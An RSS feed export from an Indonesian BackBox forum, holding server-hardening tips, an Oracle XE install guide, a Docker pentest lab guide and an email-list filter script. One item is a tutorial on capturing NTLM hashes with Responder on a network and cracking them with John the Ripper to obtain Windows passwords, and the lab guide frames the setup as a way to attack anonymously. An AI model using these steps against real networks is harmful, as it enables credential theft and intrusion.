Dan ini lah alasan fundamental saya kenapa saya lebih suka fedora daripada turunan redhat yang lain.<br />
<br />
Dari penjelasan singkat ini saya hanya ingin menyampaikan kalau statement saya bisa saja salah, dan bisa saja benar.<br />
Tapi tidak luput dari hal itu kalian bisa coba buktikan sendiri yang mana system operasi terbaik menurut versi kalian.<br />
Di sini saya hanya mencoba menyampaikan apa yang telah saya teliti dan saya buktikan sendiri.<br />
Selebihnya kalian bisa menilai sendiri. :)<br />
<br />
Kembali ke bahasan awal yaitu apa dan bagaimana teknik untuk mengamankan server dari berbagai serangan.<br />
Kali ini saya akan menjelaskan secara teknis menggunakan system operasi yang sangat banyak di gunakan oleh orang orang di dunia yaitu menggunakan <span style="color: #ff6633;" class="mycode_color">Ubuntu</span> sebagai dasar untuk pengamanan server.<br />
Kenapa saya menggunakan Ubuntu dalam praktek pengamanannya??<br />
Tugas saya kali ini adalah meng edukasi kepada setiap sysadmin yang telah terlanjur menggunakan ubuntu atau debian sebagai system operasi dasar yang di gunakan untuk kebutuhan server, walaupun saya sendiri menggunakan OpenBSD sebagai system operasi default untuk kebutuhan server yang saya kelola.<br />
Selain itu juga setingan Ubuntu yang harus di rubah lebih kompleks daripada setingan OpenBSD sendiri.<br />
Karena di OpenBSD sudah ter seting keamana secara default, kita hanya tinggal seting sedikit saja untuk mendapatkan hasil yang lebih baik.<br />
<br />
Kedepannya saya akan menjelaskan beberapa judul yang telah saya tulis di bawah yaitu:<br />
<br />
A. <a href="https://www.backboxindonesia.or.id/thread-245.html" target="_blank" class="mycode_url">Meminimalisir serangan dos/ddos pada server</a><br />
<ol type="1" class="mycode_list">
</li>
<li>Blok traffic masuk ICMP<br />
</li>
<li>Blok IP yang di sinyalir membahayakan server dengan iptables<br />
</li>
<li>Batasi jumlah traffic masuk pada server<br />
</li>
<li>Tutup port yang tidak di perlukan<br />
</li>
<li>Batasi ukuran file yang di upload<br />
</li>
<li>Pasang IDS &amp; IPS untuk meminimalisir serangan<br />
</li></ol>
<br />
B. Menangkal serangan bruteforce<br />
<ol type="1" class="mycode_list">
</li>
<li>Jangan izinkan user root masuk ke dalam ssh atau gunakan user biasa untuk login ke ssh<br />
</li>
<li>Gunakan private key yang di password untuk login ke ssh<br />
</li>
<li>Ganti port default ssh menjadi port random<br />
</li>
<li>Batasi pengecekan password yang salah dengan fail2ban<br />
</li>
<li>Usahakan password yang di gunakan tidak mudah di tebak<br />
</li>
<li>Segala hal yang berhubungan dengan password harus di bedakan<br />
</li></ol>
<br />
C. Meningkatkan keamanan pada aplikasi yang di pakai<br />
<ol type="1" class="mycode_list">
</li>
<li>Enkripsi setiap script config database yang di gunakan di server atau pindahkan ke folder yang tidak biasanya<br />
</li>
<li>Gunakan ssl di dalam webserver<br />
</li>
<li>Jangan simpan private key di dalam server<br />
</li>
<li>Jangan simpan file backup di dokumen publik webserver<br />
</li>
<li>Rubah alamat phpmyadmin jadi alamat acak<br />
</li>
<li>Rubah alamat login admin jadi alamat acak<br />
</li>
<li>Gunakan OTP untuk login ke dalam aplikasi <br />
</li>
<li>Filter semua POST dan GET yang ada dalam aplikasi<br />
</li></ol>
<br />
D. Meningkatkan keamana jaringan pada server<br />
<ol type="1" class="mycode_list">
</li>
<li>Batasi koneksi outgoing menggunakan iptables<br />
</li>
<li>Nonaktifkan DNS di /etc/resolv.conf<br />
</li>
<li>Hanya izinkan port yang terbuka saja yang bisa di akses publik menggunakan ufw/iptables<br />
</li>
<li>Jangan buka port database ke publik<br />
</li>
<li>Gunakan 1 ip gateway, 1 ip netmask, 1 ip broadcast, 1 ip address, dan 1 vlan untuk 1 aplikasi<br />
</li></ol>
<br />
E. Meningkatkan keamanan pada server<br />
<ol type="1" class="mycode_list">
</li>
<li>Selalu update system operasi yang sedang di gunakan<br />
</li>
<li>Sembunyikan versi PHP, apache, dll di header<br />
</li>
<li>Non aktifkan directory listing di webserver<br />
</li>
<li>Disable shell pada user web server "www-data" di /etc/passwd<br />
</li>
<li>Non aktifkan fungsi execute command seperti exec, passthru, php-cgi kalo tidak di perlukan<br />
</li>
<li>Di history command jangan tertinggal password apapun<br />
</li></ol>
<br />
F. Monitoring server untuk meningkatkan keamanan<br />
<ol type="1" class="mycode_list">
</li>
<li>Selalu cek log aktivitas server (monitoring)<br />
</li>
<li>Cek cronjob atau crontab setiap waktu di setiap user<br />
</li>
<li>Cek setiap service yang berjalan agar tidak terjadi misconfigurasi<br />
</li>
<li>Pasang alamat admin palsu (honeypot)<br />
</li></ol>
<br />
Untuk kelanjutan artikel kali ini saya akan post di thread yang berbeda.<br />
Tunggu saja updatean selanjutnya.<br />
Sekian.. ;)]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Cara installasi Oracle eXpress Edition di Ubuntu]]></title>
			<link>https://www.backboxindonesia.or.id/thread-243.html</link>
			<pubDate>Sat, 28 Jul 2018 11:58:11 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-243.html</guid>
			<description><![CDATA[Hallo guys,<br />
Kali ini saya akan mendokumentasikan pengalaman saya saat menginstall Oracle database di dalam system operasi berbasis Ubuntu. Tapi di sini juga kalian bisa menerapkan cara ini di dalam Backbox juga. karena Backbox sendiri termasuk ke dalam distro ubuntu.<br />
<br />
Dalam kesempatan kali ini saya akan share mengenai cara installasi Oracle XE (eXpress Edition), karena ketika saya mencari tutorial cara installasi Oracle XE di ubuntu sendiri cukup rumit bagi pemula seperti saya hehe<br />
Karena dari halaman resmi <a href="http://www.oracle.com/technetwork/database/database-technologies/express-edition/downloads/index.html" target="_blank" class="mycode_url">oracle</a> sendiri hanya menyediakan installer untuk system operasi linux turunan dari redhat saja seperti Fedora atau Centos. Tapi di kesempatan kali ini saya sudah membuat file github sendiri untuk menyelesaikan masalah ini.<br />
<br />
Langsung saja kita masuk ke topik pembicaraan di awal yaitu tentang installasi Oracle XE.<br />
Caranya cukup sederhana, kita cukup clone github. Setelah itu kita eksekusi file setup.sh<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; git clone https://github.com/koboi137/oracle-xe<br />
&#36; cd oracle-xe<br />
&#36; bash setup.sh</code></div></div><br />
Cukup mudah bukan?? hehe<br />
<br />
Secara default setup di atas akan menggenerate user password untuk masuk ke dalam database.<br />
Configurasinya kurang lebih seperti ini<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>hostname: localhost<br />
port: 1521<br />
sid: xe<br />
username: system<br />
password: oracle</code></div></div><br />
Selain itu juga ada setingan APEX untuk memonitoring penggunaan database dll.<br />
Untuk aksesnya bisa di lihat di bawah ini.<br />
<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code># http://localhost:8080/apex/apex_admin<br />
username: ADMIN<br />
password: admin</code></div></div><br />
Cara ini sudah saya praktekkan di dalam VPS, Virtualbox, dan docker. Kalo saat installasi ada error bisa konsul di kolom komentar. :)<br />
<br />
Note : Jika kalian ingin mengganti password default saat installasi, kalian bisa edit terlebih dahulu file setup.sh di baris ke 31<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>printf 8080&#92;&#92;n1521&#92;&#92;noracle&#92;&#92;noracle&#92;&#92;ny&#92;&#92;n | /etc/init.d/oracle-xe configure &amp;&amp;</code></div></div><br />
Ganti tulisan "oracle" dengan password yang kalian inginkan.<br />
Sekiannn ;)]]></description>
			<content:encoded><![CDATA[Hallo guys,<br />
Kali ini saya akan mendokumentasikan pengalaman saya saat menginstall Oracle database di dalam system operasi berbasis Ubuntu. Tapi di sini juga kalian bisa menerapkan cara ini di dalam Backbox juga. karena Backbox sendiri termasuk ke dalam distro ubuntu.<br />
<br />
Dalam kesempatan kali ini saya akan share mengenai cara installasi Oracle XE (eXpress Edition), karena ketika saya mencari tutorial cara installasi Oracle XE di ubuntu sendiri cukup rumit bagi pemula seperti saya hehe<br />
Karena dari halaman resmi <a href="http://www.oracle.com/technetwork/database/database-technologies/express-edition/downloads/index.html" target="_blank" class="mycode_url">oracle</a> sendiri hanya menyediakan installer untuk system operasi linux turunan dari redhat saja seperti Fedora atau Centos. Tapi di kesempatan kali ini saya sudah membuat file github sendiri untuk menyelesaikan masalah ini.<br />
<br />
Langsung saja kita masuk ke topik pembicaraan di awal yaitu tentang installasi Oracle XE.<br />
Caranya cukup sederhana, kita cukup clone github. Setelah itu kita eksekusi file setup.sh<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; git clone https://github.com/koboi137/oracle-xe<br />
&#36; cd oracle-xe<br />
&#36; bash setup.sh</code></div></div><br />
Cukup mudah bukan?? hehe<br />
<br />
Secara default setup di atas akan menggenerate user password untuk masuk ke dalam database.<br />
Configurasinya kurang lebih seperti ini<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>hostname: localhost<br />
port: 1521<br />
sid: xe<br />
username: system<br />
password: oracle</code></div></div><br />
Selain itu juga ada setingan APEX untuk memonitoring penggunaan database dll.<br />
Untuk aksesnya bisa di lihat di bawah ini.<br />
<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code># http://localhost:8080/apex/apex_admin<br />
username: ADMIN<br />
password: admin</code></div></div><br />
Cara ini sudah saya praktekkan di dalam VPS, Virtualbox, dan docker. Kalo saat installasi ada error bisa konsul di kolom komentar. :)<br />
<br />
Note : Jika kalian ingin mengganti password default saat installasi, kalian bisa edit terlebih dahulu file setup.sh di baris ke 31<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>printf 8080&#92;&#92;n1521&#92;&#92;noracle&#92;&#92;noracle&#92;&#92;ny&#92;&#92;n | /etc/init.d/oracle-xe configure &amp;&amp;</code></div></div><br />
Ganti tulisan "oracle" dengan password yang kalian inginkan.<br />
Sekiannn ;)]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[#ask   ada yg tau kenapa backbox tidak bisa upgrade]]></title>
			<link>https://www.backboxindonesia.or.id/thread-242.html</link>
			<pubDate>Sun, 10 Jun 2018 19:00:20 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-242.html</guid>
			<description><![CDATA[Failed to fetch <a href="http://ppa.launchpad.net/pinta-maintainers/pinta-stable/ubuntu/dists/xenial/main/binary-i386/Packages" target="_blank" class="mycode_url">http://ppa.launchpad.net/pinta-maintaine...6/Packages</a>  404  Not Found]]></description>
			<content:encoded><![CDATA[Failed to fetch <a href="http://ppa.launchpad.net/pinta-maintainers/pinta-stable/ubuntu/dists/xenial/main/binary-i386/Packages" target="_blank" class="mycode_url">http://ppa.launchpad.net/pinta-maintaine...6/Packages</a>  404  Not Found]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Hacking windows 7,8,10 (Responder + john + MS17-010)]]></title>
			<link>https://www.backboxindonesia.or.id/thread-241.html</link>
			<pubDate>Thu, 24 May 2018 06:43:23 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-241.html</guid>
			<description><![CDATA[Hallo guys,<br />
Kali ini saya akan share bagaimana caranya hacking komputer (berbasis windows) di dalam suatu jaringan.<br />
Menurut saya cara ini paling efektif dari sekian cara yang pernah saya pelajari sebelumnya. Karena target di sini adalah hampir semua versi windows yang menjadi target kita.<br />
<br />
Bahan bahan yang harus kita persiapkan.<br />
1. Responder [ <a href="https://github.com/SpiderLabs/Responder" target="_blank" class="mycode_url">https://github.com/SpiderLabs/Responder</a> ]<br />
2. John (John the Ripper) [ <a href="https://github.com/koboi137/john" target="_blank" class="mycode_url">https://github.com/koboi137/john</a> ]<br />
3. Metasploit<br />
<br />
Pertama adalah Responder.<br />
Untuk cara installasinya cukup clone dari github<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; git clone https://github.com/SpiderLabs/Responder</code></div></div><br />
Tools ini fungsinya untuk mengarahkan setiap request di browser yang membuka hostname yang belum terpointer ke ip address atau domain yang di buka belum terdaftar di whois kemudian belum terpointer ke ip address. Sebagai contoh linknya seperti ini "http://localdomain/", yang nantinya setiap link tersebut di arahkan ke ip address kita untuk mendapatkan NTLM (NeTwork LAN Manager) Hash. NTLM Hash ini bisa kita crack untuk mendapatkan password dari system target.<br />
<br />
<br />
Kedua installasi john.<br />
John yang kita butuhkan di sini adalah john versi jumbo, yang kita pakai secara default di system backbox sendiri itu masih versi yang biasa. Makanya saya buatkan git baru untuk installasi john di system backbox yang sekarang. Kalo di system kita sudah terpasang versi jumbo, cara ini bisa kalian skip.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; sudo su<br />
&#36; apt-get install openssl libgmp-dev libgomp1<br />
&#36; cd /opt<br />
&#36; git clone https://github.com/koboi137/john<br />
&#36; cd john/<br />
&#36; mv librexgen.so.2.0.8 /usr/local/lib/<br />
&#36; ln -s /usr/local/lib/librexgen.so.2.0.8 /usr/local/lib/librexgen.so.2.0<br />
&#36; ln -s /usr/local/lib/librexgen.so.2.0.8 /usr/local/lib/librexgen.so<br />
&#36; ldconfig</code></div></div><br />
Cara mengeksekusi john<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; /opt/john/john</code></div></div><br />
<br />
Yang ketiga metasploit.<br />
Secara default metasploit sudah terinstall di system backbox, tapi kalo kalian belum menginstall metasploit bisa baca panduannya di github<br />
=&gt; <a href="https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment" target="_blank" class="mycode_url">https://github.com/rapid7/metasploit-fra...nvironment</a><br />
<br />
<br />
Oke kalo semuanya sudah terinstall kita masuk ke cara exploitasinya.<br />
Pertama kita jalankan Responder<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; cd Responder<br />
&#36; python Responder.py -I wlan0</code></div></div><br />
Options -I adalah interface yang kita gunakan, di sini saya menggunakan interface wlan0 karena saya bermain di jaringan wireless.<br />
Kurang lebih nanti akan seperti ini prosesnya<br />
<br />
<img src="https://image.prntscr.com/image/mpxfeCLlRC2n8pgdmJO3qw.png" alt="[Image: mpxfeCLlRC2n8pgdmJO3qw.png]" class="mycode_img" /><br />
<br />
Di paling bawah ada keterangan NTLM Hash, dan itulah tujuan kita menggunakan responder yaitu mendapatkan NTLM Hash yang nantinya akan kita crack menggunakan john.<br />
<br />
<br />
Setelah kita mendapatkan NTLM Hash langkah selanjutnya kita crack menggunakan john.<br />
Perintahnya kurang lebih seperti ini.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; cd Responder<br />
&#36; cd logs/<br />
&#36; /opt/john/john HTTP-NTLMv2-[IPADDRESS].txt</code></div></div><br />
Atau kalian juga bisa <span style="color: #33cc33;" class="mycode_color">menggunakan wordlist</span>, kalo cara ini tidak mendapatkan hasil.<br />
<br />
Hasilnya akan menjadi seperti ini kalo kalian berhasil meng crack Hash yang kita dapat dari Responder.<br />
<br />
<img src="https://image.prntscr.com/image/8h5VBI1fSxu7FRn0LgTv0g.png" alt="[Image: 8h5VBI1fSxu7FRn0LgTv0g.png]" class="mycode_img" /><br />
<br />
Setelah kita mendapatkan user dan password komputer target, kita langsung menggunakan metasploit untuk masuk ke komputer target.<br />
Langkah selanjutnya akan saya lanjut nanti. Sorry tutorialnya belum beres hehe]]></description>
			<content:encoded><![CDATA[Hallo guys,<br />
Kali ini saya akan share bagaimana caranya hacking komputer (berbasis windows) di dalam suatu jaringan.<br />
Menurut saya cara ini paling efektif dari sekian cara yang pernah saya pelajari sebelumnya. Karena target di sini adalah hampir semua versi windows yang menjadi target kita.<br />
<br />
Bahan bahan yang harus kita persiapkan.<br />
1. Responder [ <a href="https://github.com/SpiderLabs/Responder" target="_blank" class="mycode_url">https://github.com/SpiderLabs/Responder</a> ]<br />
2. John (John the Ripper) [ <a href="https://github.com/koboi137/john" target="_blank" class="mycode_url">https://github.com/koboi137/john</a> ]<br />
3. Metasploit<br />
<br />
Pertama adalah Responder.<br />
Untuk cara installasinya cukup clone dari github<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; git clone https://github.com/SpiderLabs/Responder</code></div></div><br />
Tools ini fungsinya untuk mengarahkan setiap request di browser yang membuka hostname yang belum terpointer ke ip address atau domain yang di buka belum terdaftar di whois kemudian belum terpointer ke ip address. Sebagai contoh linknya seperti ini "http://localdomain/", yang nantinya setiap link tersebut di arahkan ke ip address kita untuk mendapatkan NTLM (NeTwork LAN Manager) Hash. NTLM Hash ini bisa kita crack untuk mendapatkan password dari system target.<br />
<br />
<br />
Kedua installasi john.<br />
John yang kita butuhkan di sini adalah john versi jumbo, yang kita pakai secara default di system backbox sendiri itu masih versi yang biasa. Makanya saya buatkan git baru untuk installasi john di system backbox yang sekarang. Kalo di system kita sudah terpasang versi jumbo, cara ini bisa kalian skip.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; sudo su<br />
&#36; apt-get install openssl libgmp-dev libgomp1<br />
&#36; cd /opt<br />
&#36; git clone https://github.com/koboi137/john<br />
&#36; cd john/<br />
&#36; mv librexgen.so.2.0.8 /usr/local/lib/<br />
&#36; ln -s /usr/local/lib/librexgen.so.2.0.8 /usr/local/lib/librexgen.so.2.0<br />
&#36; ln -s /usr/local/lib/librexgen.so.2.0.8 /usr/local/lib/librexgen.so<br />
&#36; ldconfig</code></div></div><br />
Cara mengeksekusi john<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; /opt/john/john</code></div></div><br />
<br />
Yang ketiga metasploit.<br />
Secara default metasploit sudah terinstall di system backbox, tapi kalo kalian belum menginstall metasploit bisa baca panduannya di github<br />
=&gt; <a href="https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment" target="_blank" class="mycode_url">https://github.com/rapid7/metasploit-fra...nvironment</a><br />
<br />
<br />
Oke kalo semuanya sudah terinstall kita masuk ke cara exploitasinya.<br />
Pertama kita jalankan Responder<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; cd Responder<br />
&#36; python Responder.py -I wlan0</code></div></div><br />
Options -I adalah interface yang kita gunakan, di sini saya menggunakan interface wlan0 karena saya bermain di jaringan wireless.<br />
Kurang lebih nanti akan seperti ini prosesnya<br />
<br />
<img src="https://image.prntscr.com/image/mpxfeCLlRC2n8pgdmJO3qw.png" alt="[Image: mpxfeCLlRC2n8pgdmJO3qw.png]" class="mycode_img" /><br />
<br />
Di paling bawah ada keterangan NTLM Hash, dan itulah tujuan kita menggunakan responder yaitu mendapatkan NTLM Hash yang nantinya akan kita crack menggunakan john.<br />
<br />
<br />
Setelah kita mendapatkan NTLM Hash langkah selanjutnya kita crack menggunakan john.<br />
Perintahnya kurang lebih seperti ini.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; cd Responder<br />
&#36; cd logs/<br />
&#36; /opt/john/john HTTP-NTLMv2-[IPADDRESS].txt</code></div></div><br />
Atau kalian juga bisa <span style="color: #33cc33;" class="mycode_color">menggunakan wordlist</span>, kalo cara ini tidak mendapatkan hasil.<br />
<br />
Hasilnya akan menjadi seperti ini kalo kalian berhasil meng crack Hash yang kita dapat dari Responder.<br />
<br />
<img src="https://image.prntscr.com/image/8h5VBI1fSxu7FRn0LgTv0g.png" alt="[Image: 8h5VBI1fSxu7FRn0LgTv0g.png]" class="mycode_img" /><br />
<br />
Setelah kita mendapatkan user dan password komputer target, kita langsung menggunakan metasploit untuk masuk ke komputer target.<br />
Langkah selanjutnya akan saya lanjut nanti. Sorry tutorialnya belum beres hehe]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Membuat virtual lab untuk pentest ( Docker Backbox )]]></title>
			<link>https://www.backboxindonesia.or.id/thread-239.html</link>
			<pubDate>Wed, 02 May 2018 07:20:37 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-239.html</guid>
			<description><![CDATA[Oke kali ini saya akan share pengalaman saya dalam melakukan penetrasi jika kita ingin tetap anonim dalam melakukan serangan dari publik menggunakan container backbox.<br />
Dalam judul kali ini saya akan membahas bagaimana caranya vps kita bisa di remot dari browser kita, penasaran bukan??<br />
Caranya cukup sederhana, pertama kita install terlebih dahulu docker dengan mengetikan perintah ini di vps <span style="font-weight: bold;" class="mycode_b"><span style="color: #33cc33;" class="mycode_color">ubuntu</span></span> kalian.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; sudo apt-get install docker.io</code></div></div><br />
setelah itu kita download container backboxnya dengan mengetikan perintah ini<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; sudo docker pull claudioviviani/backbox4browser-xfce-full<br />
&#36; sudo docker run -t -i -d -p 6080:6080 claudioviviani/backbox4browser-xfce-full</code></div></div><br />
<br />
Cukup mudah bukan cara installasinya?? hehe<br />
Kalo sudah terinstall kita coba buka ip vps kita di browser dengan menambahkan port 6080. Kurang lebih tampilannya seperti ini.<br />
<br />
<img src="http://i.prntscr.com/bDopU8waQx6mcVe3dPzebQ.png" alt="[Image: bDopU8waQx6mcVe3dPzebQ.png]" class="mycode_img" /><br />
<br />
Di sini kita sudah menginstall container backbox di vps kita.<br />
Untuk masuk ke mode root password defaultnya adalah<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>Pass : bbuser</code></div></div><br />
Note : password sebaiknya kalian ganti setelah installasi, karena untuk menghindari agar containernya tidak di otak atik oleh orang lain.<br />
<br />
<br />
Di sini posisi container kita port nya masih bisa di akses publik, alangkah baiknya vps kita di <span style="color: #33cc33;" class="mycode_color">tutup portnya menggunakan firewall</span>. Kalian bisa menggunakan iptables atau ufw ( unix firewall ) untuk menutup port tersebut. Setelah itu kalian <span style="color: #33cc33;" class="mycode_color">install server openvpn di vps kalian</span> agar si container tidak di akses oleh sembarang orang.<br />
<br />
Sedikit tips aja jika kalian ingin tetap anonim di dalam container yang telah kita buat, kita bisa menggunakan tor di browser kita.<br />
Setingnya kurang lebih seperti ini<br />
<br />
<img src="http://i.prntscr.com/W7v3aZgZQV6exMl9lDTu2A.png" alt="[Image: W7v3aZgZQV6exMl9lDTu2A.png]" class="mycode_img" /><br />
<br />
atau kalo di terminal kita ingin menggunakan tor juga kita bisa menggunakan tsocks.<br />
<br />
Mungkin cukup sekian pembahasan kali ini. Kurang lebih nya mohon di ma'lum. hehe]]></description>
			<content:encoded><![CDATA[Oke kali ini saya akan share pengalaman saya dalam melakukan penetrasi jika kita ingin tetap anonim dalam melakukan serangan dari publik menggunakan container backbox.<br />
Dalam judul kali ini saya akan membahas bagaimana caranya vps kita bisa di remot dari browser kita, penasaran bukan??<br />
Caranya cukup sederhana, pertama kita install terlebih dahulu docker dengan mengetikan perintah ini di vps <span style="font-weight: bold;" class="mycode_b"><span style="color: #33cc33;" class="mycode_color">ubuntu</span></span> kalian.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; sudo apt-get install docker.io</code></div></div><br />
setelah itu kita download container backboxnya dengan mengetikan perintah ini<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; sudo docker pull claudioviviani/backbox4browser-xfce-full<br />
&#36; sudo docker run -t -i -d -p 6080:6080 claudioviviani/backbox4browser-xfce-full</code></div></div><br />
<br />
Cukup mudah bukan cara installasinya?? hehe<br />
Kalo sudah terinstall kita coba buka ip vps kita di browser dengan menambahkan port 6080. Kurang lebih tampilannya seperti ini.<br />
<br />
<img src="http://i.prntscr.com/bDopU8waQx6mcVe3dPzebQ.png" alt="[Image: bDopU8waQx6mcVe3dPzebQ.png]" class="mycode_img" /><br />
<br />
Di sini kita sudah menginstall container backbox di vps kita.<br />
Untuk masuk ke mode root password defaultnya adalah<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>Pass : bbuser</code></div></div><br />
Note : password sebaiknya kalian ganti setelah installasi, karena untuk menghindari agar containernya tidak di otak atik oleh orang lain.<br />
<br />
<br />
Di sini posisi container kita port nya masih bisa di akses publik, alangkah baiknya vps kita di <span style="color: #33cc33;" class="mycode_color">tutup portnya menggunakan firewall</span>. Kalian bisa menggunakan iptables atau ufw ( unix firewall ) untuk menutup port tersebut. Setelah itu kalian <span style="color: #33cc33;" class="mycode_color">install server openvpn di vps kalian</span> agar si container tidak di akses oleh sembarang orang.<br />
<br />
Sedikit tips aja jika kalian ingin tetap anonim di dalam container yang telah kita buat, kita bisa menggunakan tor di browser kita.<br />
Setingnya kurang lebih seperti ini<br />
<br />
<img src="http://i.prntscr.com/W7v3aZgZQV6exMl9lDTu2A.png" alt="[Image: W7v3aZgZQV6exMl9lDTu2A.png]" class="mycode_img" /><br />
<br />
atau kalo di terminal kita ingin menggunakan tor juga kita bisa menggunakan tsocks.<br />
<br />
Mungkin cukup sekian pembahasan kali ini. Kurang lebih nya mohon di ma'lum. hehe]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Script Filter Email : Gmail, Yahoo & Hotmail]]></title>
			<link>https://www.backboxindonesia.or.id/thread-238.html</link>
			<pubDate>Wed, 07 Mar 2018 18:55:09 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-238.html</guid>
			<description><![CDATA[lama ane tidak terjun ke dunia fana ini hihi<br />
kali ini ane mau share script dan sdikit jelaskan tentang tools buatan ane mailfilter.py <br />
langsung aja cekidot ke source code nya : <br />
<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>#!/usr/bin/env python<br />
<br />
from optparse import OptionParser<br />
import os.path<br />
import re<br />
<br />
class warna():&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; #ini definisikan warna<br />
    cetak = '&#92;033[0m'<br />
    ijo ='&#92;033[1;32m'<br />
    putih = '&#92;033[1;37m'<br />
    biru = '&#92;033[1;34m'<br />
    kuning = '&#92;033[1;33m'<br />
    abang = '&#92;033[1;31m'<br />
<br />
def author():&nbsp;&nbsp; <br />
    print('''%s&nbsp;&nbsp;#tanda %s untuk menentukan string warna<br />
______  ___      ___________________________________<br />
___   |/  /_____ ___(_)__  /___  ____/__(_)__  /_  /_____________<br />
__  /|_/ /_  __ `/_  /__  / __  /_   __  /__  /_  __/  _ &#92;_  ___/<br />
_  /  / / / /_/ /_  / _  /___  __/   _  / _  / / /_ /  __/  /<br />
/_/  /_/  &#92;__,_/ /_/  /_____/_/      /_/  /_/  &#92;__/ &#92;___//_/<br />
                                                       v.01<br />
%s<br />
[+] Author      : Ruitze<br />
[+] Tool        : MailFilter v.01<br />
[+] Description : Filter mailist Gmail, Yahoo, Hotmail<br />
[+] Usage       : python mailFilter.py nameMailist -o %s''' % (warna.ijo,warna.putih, warna.cetak))<br />
<br />
<br />
<br />
<br />
regex = re.compile(r'''(<br />
                   ([a-zA-Z0-9._%+-]+)<br />
                    @<br />
                    (gmail|yahoo|hotmail)<br />
                    (&#92;.com)<br />
                    )''', re.VERBOSE)<br />
<br />
def file_to_str(filename):<br />
    with open(filename) as f:<br />
        return f.read().lower()<br />
<br />
def get_emails(s):<br />
    return (email[0] for email in re.findall(regex, s) if not email[0].startswith('//'))<br />
<br />
def main():<br />
    parser = OptionParser()<br />
    parser.add_option('-o','--output',dest='output',help='output file to saveFile.txt', action='store_true')<br />
    (options, args) = parser.parse_args()<br />
    try:<br />
        if args and options.output:<br />
            for arg in args:<br />
                if os.path.isfile(arg):<br />
                    for email in get_emails(file_to_str(arg)):<br />
                        if 'gmail' in email:<br />
                            f =open('gmailFile.txt', 'a')<br />
                            f.write(email+'&#92;n')<br />
                            f.close()<br />
                        elif 'yahoo' in email:<br />
                            f = open('yahooFile.txt', 'a')<br />
                            f.write(email + '&#92;n')<br />
                            f.close()<br />
                        else:<br />
                            f = open('hotmailFile.txt', 'a')<br />
                            f.write(email + '&#92;n')<br />
                            f.close()<br />
                    author()<br />
                    print(warna.cetak)<br />
                    print('%s[+] Succes filter to gmailFile.txt   [+]%s' % (warna.biru, warna.cetak))<br />
                    print('%s[+] Succes filter to yahooFile.txt   [+]%s' % (warna.kuning, warna.cetak))<br />
                    print('%s[+] Succes filter to hotmailFile.txt [+]%s' % (warna.abang, warna.cetak))<br />
                else:<br />
                    print('"{}" is not a file.').format(arg)<br />
<br />
        else:<br />
            author()<br />
            print(warna.cetak)<br />
    except Exception as e:<br />
        print('Error Description', e)<br />
<br />
<br />
if __name__=='__main__':<br />
    main()</code></div></div>]]></description>
			<content:encoded><![CDATA[lama ane tidak terjun ke dunia fana ini hihi<br />
kali ini ane mau share script dan sdikit jelaskan tentang tools buatan ane mailfilter.py <br />
langsung aja cekidot ke source code nya : <br />
<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>#!/usr/bin/env python<br />
<br />
from optparse import OptionParser<br />
import os.path<br />
import re<br />
<br />
class warna():&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; #ini definisikan warna<br />
    cetak = '&#92;033[0m'<br />
    ijo ='&#92;033[1;32m'<br />
    putih = '&#92;033[1;37m'<br />
    biru = '&#92;033[1;34m'<br />
    kuning = '&#92;033[1;33m'<br />
    abang = '&#92;033[1;31m'<br />
<br />
def author():&nbsp;&nbsp; <br />
    print('''%s&nbsp;&nbsp;#tanda %s untuk menentukan string warna<br />
______  ___      ___________________________________<br />
___   |/  /_____ ___(_)__  /___  ____/__(_)__  /_  /_____________<br />
